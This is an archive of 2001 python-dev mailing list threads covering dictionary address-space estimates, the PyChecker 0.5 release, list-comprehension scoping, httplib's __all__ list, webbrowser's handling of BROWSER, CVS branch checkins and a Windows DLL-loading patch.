> > 64-bit clocks counting seconds will turn over in approximately six > trillion years, long after the expansion of the Universe will have > dropped its energy density low enough to make computation...well, > let's just say "difficult" and leave it at that. > > Nobody needs 128 bits of integer or floating-point precision, either. > There's basically no source of data to compute with that's got > anywhere near 22 significant digits of accuracy -- 48 bits is > about the most people in scientific computing ever use. Just you wait... someday marketing people will probably invent the world memory facility and start assigning a few hundred Terabytes for everyone on this planet to use for his/her data storage -- store once, use everywhere ;-) Let's assume we have 12e9 people on this planet by that time, then we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or roughly 2^80 bytes per civilization. Of course, they will want to run Python in order to manage that data and so will all those Palm users hooking up to the facility... ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr@thyrsus.com Thu May 31 11:31:07 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 06:31:07 -0400 Subject: [Python-Dev] One more dict trick In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com> Message-ID: <20010531063107.B5510@thyrsus.com> M.-A. Lemburg : > > 2^64 = 18446744073709551616, which is roughly 10 ^ 22.
Let's assume > > a memory density of, say, 2^20 machine words or roughly 8 megabytes per > > cubic centimeter (much, *much* better than we'll be able to do for the > > foreseeable future -- remember power distribution and heat dissipation). > > Where did you get those numbers from ? There are memory sticks > with 128 MB around and these measure about 2.5 cm^2 * 1 mm. Remember power distribution and heat dissipation. You can't just figure volume of the memory ICs, you have to include power and cooling and structural support too. I eyeballed some DRAM modules I had lying around. In any case, my figures aren't that sensitive to memory density. If I'm off by a factor of 64 the diameter of the memory sphere only drops by a factor of four (it's that cube-root relationship between volume and radius). So it's only half the radius of the Sun. That's still way, *way* more mass than all the planets in the Solar System put together. > Just you wait... someday marketing people will probably invent the > world memory facility and start assigning a few hundred > Terabytes for everyone on this planet to use for his/her data > storage -- store once, use everywhere ;-) > > Let's assume we have 12e9 people on this planet by that time, then > we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or > roughly 2^80 bytes per civilization. Nah. Individual storage requirements would never get that large. Bill Joy did a study on this once and figured out that human beings can generate about 14GB of text during their lifetimes, max. In a system like the Web-on-steroids one you're supposing, higher-volume stuff like streaming video or Linux-kernel archives would be stored *once* with URLs pointing at them from people's individual stores. One terabyte (2^40) per person leaves plenty of headroom (two orders of magnitude larger). We could still handle a world population of 2^24 or roughly 16 billion people.
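The powers of two and unit conversions traded in this sub-thread can be recomputed directly. A short sketch: the inputs (2**20 words per cubic centimetre, one terabyte per person for 2**24 people, 12e9 people at 100e12 bytes each) are the ones stated in the messages, while the 365.25-day year is an assumption chosen here; the sphere radius uses the standard r = (3V / 4π)^(1/3).

```python
import math

two_64 = 2 ** 64
print(f"2**64 = {two_64} ~ {two_64:.3e}")

# One terabyte (2**40 bytes) per person for 2**24 people:
people = 2 ** 24
print(people, 2 ** 40 * people == two_64)

# 12e9 people with 100e12 bytes each, next to 2**80:
storage_bytes = 12e9 * 100e12
print(f"{storage_bytes:.3e} vs 2**80 = {2 ** 80:.3e}")

# How long a 64-bit counter of seconds lasts, in 365.25-day years:
seconds_per_year = 365.25 * 24 * 3600
years_2_64 = two_64 / seconds_per_year
print(f"{years_2_64:.3e} years")

# Radius of a sphere holding 2**64 words at 2**20 words per cubic centimetre:
volume_cm3 = two_64 / 2 ** 20
radius_m = (3 * volume_cm3 / (4 * math.pi)) ** (1 / 3) / 100
print(f"{radius_m:.0f} m")
```

With these inputs, 2**64 is about 1.84 × 10^19, 2**24 is 16,777,216, 1.2 × 10^24 bytes is indeed close to 2**80 (about 1.21 × 10^24), a 64-bit seconds counter lasts roughly 5.8 × 10^11 years, and the sphere's radius comes out near 160 metres.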
(I think the size of the Library of Congress has been estimated at several thousand terabytes.) -- Eric S. Raymond I don't like the idea that the police department seems bent on keeping a pool of unarmed victims available for the predations of the criminal class. -- David Mohler, 1989, on being denied a carry permit in NYC From thomas@xs4all.net Thu May 31 11:45:33 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 12:45:33 +0200 Subject: [Python-Dev] One more dict trick In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400 References: <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> Message-ID: <20010531124533.J690@xs4all.nl> On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote: > M.-A. Lemburg : > > In any case, this will avoid us the trouble of having to check > > those poly numbers every time Intel decides to bump the register > > width by another factor of two ;-) > This seems unlikely. Why ? Bumping register size doesn't mean Intel expects to use it all as address space. They could be used for video-processing, or to represent a modest range of rationals , or to help core 'net routers deal with those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger registers as well. Oh wait... I get it! You were trying to get yourself in the history books as the guy that said "64 bits ought to be enough for everyone" :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From PyChecker Wed May 30 03:49:45 2001 From: PyChecker (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++.
It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. 
Here's the CHANGELOG:

* Catch internal errors "gracefully" and turn into a warning
* Add checking of most module scoped code
* Add pychecker subdir to imports to prevent filename conflicts
* Don't produce unused local variable warning if variable name == '_'
* Add -g/--allglobals option to report all global warnings, not just first
* Add -V/--varlist option to selectively ignore variable not used warnings
* Add test script and expected results
* Print all instructions when using debug (-d/--debug)
* Overhaul internal stack handling so we can look for more problems
* Fix glob'ing problems (all args after glob were ignored)
* Fix spurious Base class __init__ not called
* Fix exception on code like: ['xxx'].index('xxx')
* Fix exception on code like: func(kw=(a < b))
* Fix line numbers for import statements

PyChecker is available on Source Forge:

Web page: http://pychecker.sourceforge.net/
Project page: http://sourceforge.net/projects/pychecker/

Neal -- pychecker@metaslash.com From beazley@cs.uchicago.edu Thu May 31 14:34:57 2001 From: beazley@cs.uchicago.edu (David Beazley) Date: Thu, 31 May 2001 08:34:57 -0500 (CDT) Subject: [Python-Dev] RE: Iteration variables and list comprehensions In-Reply-To: References: Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu> Greg Ewing writes: > Another advantage of changing both together is that > we can continue to describe listcomp semantics in terms > of for-loops instead of lambdas. Is this really an advantage? To me, the lambda semantics are a lot more intuitive in terms of matching the way that list comprehensions are actually used and ought to work (although I will agree that the for-loop explanation is a good way to describe the internals of what a list comprehension actually does). I think I would be opposed to changing normal for-loop semantics to match any change made in list-comprehensions.
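The loop-variable behaviour at stake here can be checked in a modern interpreter. A small sketch, assuming Python 3, where list comprehensions were eventually given their own scope while plain for-loop variables still survive the loop; `find_first_negative` and `leaked_names` are hypothetical helpers illustrating the search-loop idiom described in this thread.

```python
def find_first_negative(values):
    """Search loop: the loop variable is still bound after 'break'."""
    for i, v in enumerate(values):
        if v < 0:
            break
    else:
        return None  # no break: the loop ran to completion without a match
    return i

def leaked_names():
    """Run a for-loop and a list comprehension in fresh namespaces and
    report what each leaves behind."""
    loop_ns, comp_ns = {}, {}
    exec("for i in range(5):\n    if i == 3:\n        break\n", loop_ns)
    exec("squares = [j * j for j in range(5)]\n", comp_ns)
    return loop_ns.get("i"), "j" in comp_ns

print(find_first_negative([4, 2, -1, 5]))  # 2
print(leaked_names())                      # (3, False) on Python 3
```

The for-loop's `i` is still 3 after the `break`, while the comprehension's `j` never reaches the enclosing namespace.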
There are too many cases where you use a loop variable after finishing a loop and I suspect that this would break a huge amount of code. For example:

    for i in r:
        ...
        if whatever:
            break
    print i

Besides, the semantic mismatch created between a listcomp and a for-loop pales in comparison to the mismatch that currently exists between the behavior of listcomps and all of the other operators. Of course, that's just my opinion--I could be wrong. > Then we won't have to go > into hiding until Guido dies or lifts the fatwah against us. fatwah? Uh... should I start talking to the witness protection program folks? Cheers, Dave From skip@pobox.com (Skip Montanaro) Thu May 31 19:02:51 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 13:02:51 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: Message-ID: <15126.34635.67975.31473@beluga.mojam.com> >>>>> "Robin" == Robin Becker writes:

Robin> from httplib import *

Robin> class Bongo(HTTPConnection):
Robin>     pass
...
Robin> NameError: name 'HTTPConnection' is not defined

It was a brain fart on my part when creating httplib.__all__. HTTPConnection was not included in that list. I will check in a fix. In the 2.1 release __all__ was defined as

    __all__ = ["HTTP"]

I have changed that to

    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
               "HTTPException", "NotConnected", "UnknownProtocol",
               "UnknownTransferEncoding", "IllegalKeywordArgument",
               "UnimplementedFileMode", "IncompleteRead",
               "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
               "ResponseNotReady", "BadStatusLine", "error"]

and will check the change into CVS shortly. (Thomas, keep an eye open for this as an addition to 2.1.1.) The workaround I would choose is to not use "from httplib import *":

    import httplib

    class Bongo(httplib.HTTPConnection):
        pass

Robin> Changing the * to HTTPConnection in ttt.py removes the problem.

Yup, that will also work.
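For comparison, a sketch of the same qualified-import workaround against the module's Python 3 name: `httplib` became `http.client`, whose `__all__` does list `HTTPConnection`. `Bongo` is the placeholder class name from Robin's report; creating an instance does not open a connection.

```python
import http.client

# Qualified import: works regardless of what __all__ lists.
class Bongo(http.client.HTTPConnection):
    pass

# Whether "from http.client import *" exposes the name depends on __all__ alone.
print("HTTPConnection" in http.client.__all__)         # True
print(issubclass(Bongo, http.client.HTTPConnection))   # True
```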
Before anyone asks, "Who died and made Skip King?", the scenario as I recall it was that the semantics of __all__ got settled on during discussions on python-dev (the goal of __all__ being to minimize namespace pollution by "from ... *"), but nobody stepped up immediately to do the grunt work, so I volunteered. The problem in relying on one person (well, at least this one person) to do this was that I had only the following tools at my disposal to decide what belonged in __all__:

* what was documented in the lib reference manual (which was at times incomplete)
* my experience with the various modules (some of which was specialized, some of which was nonexistent)
* the standard library (which generally doesn't use "from ... *" much)
* input from python-dev (whose members also appear not to use "from ... *" very liberally)

In retrospect, I probably should have polled c.l.py with a summary of what I came up with before the 2.1 ship date. If people would like me to do that now (before 2.2 gets anywhere close to release) to try and fill in as many missing symbols as possible, let me know. -- Skip Montanaro (skip@pobox.com) (847)971-7098 From skip@pobox.com (Skip Montanaro) Thu May 31 19:06:01 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 13:06:01 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin Message-ID: <15126.34825.167026.520535@beluga.mojam.com> I just updated httplib.py to expand the list of names in its __all__ list. I was operating on version 1.34. After the checkin I am looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says "release21-maint". Did I muff it? If so, how should I do an unmuff operation?
Skip From robin@jessikat.fsnet.co.uk Thu May 31 19:33:02 2001 From: robin@jessikat.fsnet.co.uk (Robin Becker) Date: Thu, 31 May 2001 19:33:02 +0100 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com> References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: In message <15126.34635.67975.31473@beluga.mojam.com>, Skip Montanaro writes >>>>>> "Robin" == Robin Becker writes: > > Robin> from httplib import * > > Robin> class Bongo(HTTPConnection): > Robin> pass > ... > Robin> NameError: name 'HTTPConnection' is not defined > >It was a brain fart on my part when creating httplib.__all__. >HTTPConnection was not included in that list. I will check in a fix. >In the 2.1 release __all__ was defined as > > __all__ = ["HTTP"] > >I have changed that to > > __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", > "HTTPException", "NotConnected", "UnknownProtocol", > "UnknownTransferEncoding", "IllegalKeywordArgument", > "UnimplementedFileMode", "IncompleteRead", > "ImproperConnectionState", "CannotSendRequest", >"CannotSendHeader", > "ResponseNotReady", "BadStatusLine", "error"] thanks; I'm still a bit puzzled as to the exact semantics. It just looks wrong. Is __all__ the only way to get things into the * version of import? Presumably HTTPConnection is being marked as a potential global in the compile phase. -- Robin Becker From skip@pobox.com (Skip Montanaro) Thu May 31 20:27:12 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 14:27:12 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: <15126.39696.370516.926735@beluga.mojam.com> Robin> thanks; I'm still a bit puzzled as to the exact semantics. It Robin> just looks wrong. Is __all__ the only way to get things into the Robin> * version of import? Essentially, yes. 
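Skip's answer can be made concrete. A minimal sketch, assuming Python 3: it builds two throwaway modules in memory (`demo_with_all` and `demo_without_all` are hypothetical names), star-imports each into a fresh namespace, and reports which names arrive. With `__all__`, only the listed names are exported; without it, every name not starting with an underscore is.

```python
import sys
import types

def star_import_names(module_name, source):
    """Create a module from source, run 'from <module> import *', return the names bound."""
    module = types.ModuleType(module_name)
    exec(source, module.__dict__)
    sys.modules[module_name] = module
    try:
        namespace = {}
        exec(f"from {module_name} import *", namespace)
    finally:
        del sys.modules[module_name]  # leave no trace in the import system
    namespace.pop("__builtins__", None)
    return sorted(namespace)

WITH_ALL = '__all__ = ["HTTP"]\nclass HTTP: pass\nclass HTTPConnection: pass\n'
WITHOUT_ALL = 'class HTTP: pass\nclass HTTPConnection: pass\n_private = 1\n'

print(star_import_names("demo_with_all", WITH_ALL))        # ['HTTP']
print(star_import_names("demo_without_all", WITHOUT_ALL))  # ['HTTP', 'HTTPConnection']
```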
If you want to just dispense with it __all__together (=:-o), you can textually replace __all__ with ___all__ in each of the standard library modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
        sed -e 's/___*all__/___all__/g' < $f > $f.tmp
        mv $f.tmp $f
    done

Note that I didn't touch any files in directories under the basic Lib directory. Robin> Presumably HTTPConnection is being marked as a potential global Robin> in the compile phase. It has nothing to do with module compilation. The contents of __all__ are a static thing in the text of the .py file, and thus far almost entirely due to me studying the inputs at hand and making a decision about what belonged and what didn't. Some python-dev people caught omissions and added them before the 2.1 release. Other than that, the mistakes are all mine. I had some misgivings about the whole thing during the midst of the task and still do, but grumbled once and completed it. Skip From skip@pobox.com (Skip Montanaro) Thu May 31 20:57:21 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 14:57:21 -0500 Subject: [Python-Dev] weird webbrowser behavior Message-ID: <15126.41505.987887.477670@beluga.mojam.com> I'm using Gnome under Mandrake 8.0 and getting very strange results using webbrowser (indirectly via pydoc). Apparently, Gnome's init code sets the BROWSER environment variable to "nautilus" (much to my surprise) and webbrowser trusts it as the god's honest truth, even though nautilus has not been registered with the webbrowser module (am I supposed to add that sort of stuff to site.py?). Accordingly, _tryorder is ['nautilus'], but 'nautilus' doesn't appear in _browsers.keys(), which is ['lynx', 'links', 'netscape', 'kfm', 'mozilla']. I think webbrowser should either ignore elements of BROWSER if they have not previously been registered (and can't be found by _iscommand) or try to register them using GenericBrowser.
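The second option Skip proposes, registering an unknown BROWSER entry through GenericBrowser, can be sketched with the module's public `register()`, `get()` and `GenericBrowser` names. `register_unknown_browser` is a hypothetical helper, and the sketch only builds the controller; it never launches anything.

```python
import webbrowser

def register_unknown_browser(command):
    """Register a bare command (e.g. a BROWSER entry webbrowser does not know)
    as a GenericBrowser and return the controller webbrowser.get() now finds."""
    webbrowser.register(command, None, webbrowser.GenericBrowser(command))
    return webbrowser.get(command)

controller = register_unknown_browser("nautilus")
print(type(controller).__name__, controller.name)  # GenericBrowser nautilus
```

Wrapping the bare command in GenericBrowser means a later `open()` would simply run `nautilus <url>`, which is the fallback Skip suggests instead of trusting an unregistered name.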
Users are apparently not the only people setting BROWSER, so the comment in the code:

    # It's the user's responsibility to register handlers for any unknown
    # browser referenced by this value, before calling open().

seems like flawed logic to me. Skip From esr@thyrsus.com Thu May 31 21:08:21 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 16:08:21 -0400 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500 References: <15126.41505.987887.477670@beluga.mojam.com> Message-ID: <20010531160821.A10314@thyrsus.com> Skip Montanaro : > I think webbrowser should either ignore elements of BROWSER if > they have not previously been registered (and can't be found by _iscommand) > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: Fred Drake and I are co-responsible for that code. If you want to patch it to do this, I won't object. -- Eric S. Raymond "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, Historical Review of Pennsylvania, 1759. From fdrake@acm.org Thu May 31 21:18:26 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 16:18:26 -0400 (EDT) Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > I just updated httplib.py to expand the list of names in its __all__ list. > I was operating on version 1.34. After the checkin I am looking at version > 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says > "release21-maint". Did I muff it? If so, how should I do an unmuff > operation?
If that's really a muff, revert the change:

    cd .../Lib/
    cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

and commit the new version as 1.34.2.2:

    cvs commit -m 'unmuff...' httplib.py

-Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From skip@pobox.com (Skip Montanaro) Thu May 31 21:30:22 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 15:30:22 -0500 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <20010531160821.A10314@thyrsus.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.43486.320228.376505@beluga.mojam.com> Eric> Fred Drake and I are co-responsible for that code. If you want to Eric> patch it to do this, I won't object. Here's a first pass that seems to work for me: https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470 though it doesn't attempt to recover if _tryorder winds up empty. Skip From skip@pobox.com (Skip Montanaro) Thu May 31 21:48:40 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Thu, 31 May 2001 15:48:40 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Message-ID: <15126.44584.300357.360209@beluga.mojam.com> >> I just updated httplib.py to expand the list of names in its __all__ >> list. I was operating on version 1.34. After the checkin I am >> looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my >> directory tree and says "release21-maint". Did I muff it? If so, >> how should I do an unmuff operation?

Fred> If that's really a muff, revert the change:
Fred>     cd .../Lib/
Fred>     cvs diff -r1.34.2.1 -r1.34 httplib.py | patch
Fred> and commit the new version as 1.34.2.2:
Fred>     cvs commit -m 'unmuff...' httplib.py

Functionally, the checkin isn't a muff (it does have the change I intended), but I was worried about the version number. Should I have checked it in as version 1.34.2.1 or 1.35? Skip From fdrake@acm.org Thu May 31 22:00:34 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:00:34 -0400 (EDT) Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com> Skip Montanaro writes:

> or try to register them using GenericBrowser. Users are apparently not the
> only people setting BROWSER, so the comment in the code:
>
>     # It's the user's responsibility to register handlers for any unknown
>     # browser referenced by this value, before calling open().
>
> seems like flawed logic to me.

Eric S. Raymond writes: > Fred Drake and I are co-responsible for that code. If you want to patch it > to do this, I won't object. I wouldn't object either. I *do* object to the system setting that variable by default by either Mandrake or Gnome -- that's just stupid and inconsiderate of the user. Now, if anyone can provide support for Nautilus, I won't object to that either. Unfortunately, Mandrake's installer stinks at upgrading (it couldn't seem to locate my 7.2 installation) and I don't have the time to figure that out. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake@acm.org Thu May 31 22:04:30 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:04:30 -0400 (EDT) Subject: [Python-Dev] Damn...
I think I might have just muffed a checkin In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> <15126.44584.300357.360209@beluga.mojam.com> Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > Functionally, the checkin isn't a muff (it does have the change I intended), > but I was worried about the version number. Should I have checked it in as > version 1.34.2.1 or 1.35? If the change should happen on the branch, leave it in. If it's also needed on the HEAD, check it in again there, and you're done. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From m.favas@per.dem.csiro.au Thu May 31 23:41:13 2001 From: m.favas@per.dem.csiro.au (Mark Favas) Date: Fri, 01 Jun 2001 06:41:13 +0800 Subject: [Python-Dev] One more dict trick Message-ID: <3B16C889.C01905BD@per.dem.csiro.au> Tried the patch (thanks, Tim!) - but I guess the things I'm running aren't too sensitive to dict speed . I see a slight speed-up, around 1-2%... Nice, elegant patch that should go places! Maybe the bio-informatics people on c.l.py (Andrew Dalke?) would be interested in trying it out? -- Mark Favas - m.favas@per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From MarkH at ActiveState.com Tue May 1 02:42:19 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 1 May 2001 10:42:19 +1000 Subject: [Python-Dev] Importing extensions on Windows 95 In-Reply-To: <3AED7248.B7386B83@lemburg.com> Message-ID: > Here's a stab at a patch. Could you review it and test it ? I > don't have enough knowledge of win32 for this... I think we can drop the getcwd call here completely. I prefer the patch below. Mark. 
Index: dynload_win.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v retrieving revision 2.7 diff -u -r2.7 dynload_win.c --- dynload_win.c 2000/10/05 10:54:45 2.7 +++ dynload_win.c 2001/05/01 00:36:40 @@ -163,24 +163,21 @@ #ifdef MS_WIN32 { - HINSTANCE hDLL; + HINSTANCE hDLL = NULL; char pathbuf[260]; - if (strchr(pathname, '\\') == NULL && - strchr(pathname, '/') == NULL) - { - /* Prefix bare filename with ".\" */ - char *p = pathbuf; - *p = '\0'; - _getcwd(pathbuf, sizeof pathbuf); - if (*p != '\0' && p[1] == ':') - p += 2; - sprintf(p, ".\\%-.255s", pathname); - pathname = pathbuf; - } - /* Look for dependent DLLs in directory of pathname first */ - /* XXX This call doesn't exist in Windows CE */ - hDLL = LoadLibraryEx(pathname, NULL, - LOAD_WITH_ALTERED_SEARCH_PATH); + LPTSTR dummy; + /* We use LoadLibraryEx so Windows looks for dependent DLLs + in directory of pathname first. However, Windows95 + can sometimes not work correctly unless the absolute + path is used. 
If GetFullPathName() fails, the LoadLibrary + will certainly fail too, so use its error code */ + if (GetFullPathName(pathname, + sizeof(pathbuf), + pathbuf, + &dummy)) + /* XXX This call doesn't exist in Windows CE */ + hDLL = LoadLibraryEx(pathname, NULL, + LOAD_WITH_ALTERED_SEARCH_PATH); if (hDLL==NULL){ char errBuf[256]; unsigned int errorCode; From thomas at xs4all.net Tue May 1 10:07:48 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 1 May 2001 10:07:48 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199 In-Reply-To: ; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700 References: Message-ID: <20010501100748.M16486@xs4all.nl> On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Python > In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python > > Modified Files: > bltinmodule.c > Log Message: > Fix buglet reported on c.l.py: map(fnc, file.xreadlines()) blows up. > Also a 2.1 bugfix candidate (am I supposed to do something with those?). No, not really. You can do me a favor by writing halfway decent checkin messages (no complaints there) and keep your fingers off the 'fix whitespace' button :) I keep a close eye on the checkins as they happen, and save away those that might need to be checked into the 2.1.1 branch. I'll go over them with a fine tooth comb when I'm approaching critical release mass :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Tue May 1 12:30:57 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 12:30:57 +0200 Subject: [Python-Dev] Importing extensions on Windows 95 References: Message-ID: <3AEE9061.32239814@lemburg.com> Mark Hammond wrote: > > > Here's a stab at a patch. Could you review it and test it ? I > > don't have enough knowledge of win32 for this... 
> > I think we can drop the getcwd call here completely. > > I prefer the patch below. If this works as expected, please check in the patch. (Note that I have not tested the patch I posted -- I've never used VC++ for anything else than compiling C extensions and GMP.) > Mark. > > Index: dynload_win.c > =================================================================== > RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v > retrieving revision 2.7 > diff -u -r2.7 dynload_win.c > --- dynload_win.c 2000/10/05 10:54:45 2.7 > +++ dynload_win.c 2001/05/01 00:36:40 > @@ -163,24 +163,21 @@ > > #ifdef MS_WIN32 > { > - HINSTANCE hDLL; > + HINSTANCE hDLL = NULL; > char pathbuf[260]; > - if (strchr(pathname, '\\') == NULL && > - strchr(pathname, '/') == NULL) > - { > - /* Prefix bare filename with ".\" */ > - char *p = pathbuf; > - *p = '\0'; > - _getcwd(pathbuf, sizeof pathbuf); > - if (*p != '\0' && p[1] == ':') > - p += 2; > - sprintf(p, ".\\%-.255s", pathname); > - pathname = pathbuf; > - } > - /* Look for dependent DLLs in directory of pathname first */ > - /* XXX This call doesn't exist in Windows CE */ > - hDLL = LoadLibraryEx(pathname, NULL, > - LOAD_WITH_ALTERED_SEARCH_PATH); > + LPTSTR dummy; > + /* We use LoadLibraryEx so Windows looks for dependent DLLs > + in directory of pathname first. However, Windows95 > + can sometimes not work correctly unless the absolute > + path is used. 
If GetFullPathName() fails, the LoadLibrary > + will certainly fail too, so use its error code */ > + if (GetFullPathName(pathname, > + sizeof(pathbuf), > + pathbuf, > + &dummy)) > + /* XXX This call doesn't exist in Windows CE */ > + hDLL = LoadLibraryEx(pathname, NULL, > + LOAD_WITH_ALTERED_SEARCH_PATH); > if (hDLL==NULL){ > char errBuf[256]; > unsigned int errorCode; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Tue May 1 23:22:11 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 23:22:11 +0200 Subject: [Python-Dev] Coercion and comparison of numbers Message-ID: <3AEF2903.79308F55@lemburg.com> I just received a bug report for mx.Number which revealed a probelm with the comparison code in Python 2.1. Looking at the code it seems that one of my original coercion patches did not make it into the core. I added a new API PyNumber_Compare() knows about the new coercion mechanism and should be called for numbers instead of trying coercion in PyObject_Compare(). Was this part of the coercion patch left out on purpose or a simple oversight ? I hope the latter... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack at oratrix.nl Tue May 1 23:23:59 2001 From: jack at oratrix.nl (Jack Jansen) Date: Tue, 1 May 2001 23:23:59 +0200 (MET DST) Subject: [Python-Dev] MacPython 2.1 released Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl> MacPython 2.1 is available for download. Get it via http://www.cwi.nl/~jack/macpython.html . Python is a high-level programming language that is suitable for simple scripting tasks as well as writing large applications. 
